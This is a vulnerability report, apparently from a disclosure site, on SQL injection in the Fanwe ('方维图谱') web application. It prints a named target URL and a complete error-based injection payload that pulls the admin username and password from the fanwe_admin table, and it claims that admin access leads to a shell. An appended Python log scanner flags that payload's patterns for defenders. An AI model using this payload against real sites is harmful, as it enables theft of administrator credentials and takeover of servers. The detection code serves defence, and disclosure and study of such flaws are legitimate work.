方维图谱 (Fanwe): front-end SQL injection, shell via the admin back end

Published: 2025-04-13
Revised: 2025-04-13

### Brief description:

Front-end SQL injection in 方维图谱 (Fanwe), leading to a shell through the admin back end.

### Details:

The following request returns an error:

```
http://t1.fanwe.net:85/index.php?action=index&hot=5'
```

Payload:

```
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,admin_name,0x3a,admin_pwd,0x23) FROM fanwe_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
```

![Screenshot](https://images.seebug.org/upload/201409/061118159568d16bac1b8886f332225375361d77.jpg)

### Proof of vulnerability:

The following request returns an error:

```
http://t1.fanwe.net:85/index.php?action=index&hot=5'
```

Payload:

```
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,admin_name,0x3a,admin_pwd,0x23) FROM fanwe_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
```

[<img...
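
A log check for the request shape shown above, as an added example that is not part of the original report: it flags requests whose decoded query string combines the building blocks of that payload (`floor(rand(0)*2)`, `count(*)` with `group by`, `information_schema`, the `fanwe_admin` table). The log lines, the combined log format and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Building blocks of the error-based payload shown above (case-insensitive).
SIGNATURES = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "count_group": re.compile(r"count\s*\(\s*\*\s*\).*group\s+by", re.I | re.S),
    "info_schema": re.compile(r"information_schema\s*\.", re.I),
    "admin_table": re.compile(r"\bfanwe_admin\b", re.I),
}
# Assumed Apache/nginx combined log format: client IP first, request line in quotes.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Sep/2014:11:00:01 +0800] "GET /index.php?action=index&hot=5 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [06/Sep/2014:11:00:09 +0800] "GET /index.php?action=index&hot=information_schema.tables HTTP/1.1" 200 5098',
    '203.0.113.5 - - [06/Sep/2014:11:01:30 +0800] "GET /index.php?action=index&hot=5%27%20and(select%201%20from'
    '(select%20count(*),concat((select%20admin_name%20from%20fanwe_admin%20limit%200,1),floor(rand(0)*2))x'
    '%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
]

def matched_signatures(url):
    """Return the sorted names of signatures found in the decoded query string."""
    query = urlsplit(url).query
    for _ in range(2):  # second pass covers double-encoded requests
        query = unquote_plus(query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))

def scan(lines, threshold=2):
    """Flag requests matching at least `threshold` signatures; returns (ip, names)."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        names = matched_signatures(m.group("url"))
        if len(names) >= threshold:
            hits.append((m.group("ip"), names))
    return hits

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG):
        print(ip, ",".join(names))
```

The threshold of two keeps a request that merely mentions one keyword (the second sample line) from being flagged.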
